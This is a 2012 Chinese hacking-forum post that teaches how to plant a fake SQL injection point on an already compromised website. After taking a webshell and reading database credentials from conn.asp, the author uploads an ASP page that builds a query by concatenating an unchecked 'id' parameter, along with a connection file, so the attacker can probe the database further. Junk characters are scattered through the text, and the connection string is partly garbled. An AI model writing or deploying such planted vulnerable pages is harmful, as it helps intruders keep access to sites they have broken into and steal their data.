找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1864|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
- z  h* w' e' n' [
! q2 ^1 n9 M/ J9 P! S今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息8 R2 e" T( ^9 j3 P* ^* G/ |
1 r! H/ Z' K" _( m. y
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!8 z6 z0 {, ^  I+ J' \/ h
" {, J& S4 o& ?
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和& I- W+ M9 a; w  t1 q8 n

# j6 u* j3 h* a, i" d密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表& v  k  `7 s, R% q+ M
! x4 @' q7 T: a! K$ |- D/ D6 A7 O
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
( |& q  H9 `3 C
) i, v. t! B+ M  }: B- r" J7 [6 z' c程序代码- L; Y" [6 h2 h  q4 c% j
<!--#include file="xx.asp"-->( l. m: O/ t9 ?! l! K/ y
<%1 H! k* h( |0 C; ^& v* ^2 A
set rs=server.createobject("ADODB.recordset")7 M0 G  z7 \& W2 Y* k4 {& C
id = request("id")
$ N- k! g% o6 NstrSQL = "select * from admin where id=" & id# c) [; t  t+ W
rs.open strSQL,conn,1,3% ^9 Z! \6 q5 E; X: j
rs.close% W- S5 P  a5 B$ X  p' s3 R
%>9 x) z1 C8 ~% j/ M) Y) a2 X
" s: }) g" M6 t- h: i+ Z7 v
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在  T$ S1 Z- ^5 ^
0 H5 z6 e; f$ h, d& @! x$ P/ x, P) |
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
! ~7 a" M2 A3 B* [4 T' D% }/ L# @% p
然后就要构造一个连接数据库的文件了,代码如下:% X! y9 t& k* [
程序代码
. r4 X% a! B, A  A# g( {& }) t<%        # d2 ?4 F  P6 @( W" c) h( u' c
strSQLServerName = "000.000.000.000"     '服务器名称或地址
1 B0 i- Z8 w% t7 O0 S" VstrSQLDBUserName = "sqlname"         '数据库帐号4 c  i  z8 I+ ^  \+ h& u# S
strSQLDBPassword = "sqlpass"         '数据库密码1 h' p: E' S4 `* F. B. W- C
strSQLDBName = "sqldataname"           '数据库名称
3 c5 {' Q# a$ L) q: r4 l  }Set conn = Server.CreateObject("ADODB.Connection")
/ r" C% [+ l0 T: _strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
/ c: |" D0 ~4 }- R9 A5 m4 mconn.open strCon! A( t+ L: q5 |% [0 j
%># {( k; I5 E; a& k8 n7 W

+ J1 B- \5 t% j& B% a. {这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,5 o, o0 H) l0 y

6 O( Q( X  A. J. u8 V* Q  i$ b就这样,正常情况下,就OK了,伪造成功……2 h# P; S6 k$ s' X! l5 C- q5 E
  U* M; G1 @7 g5 f
           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表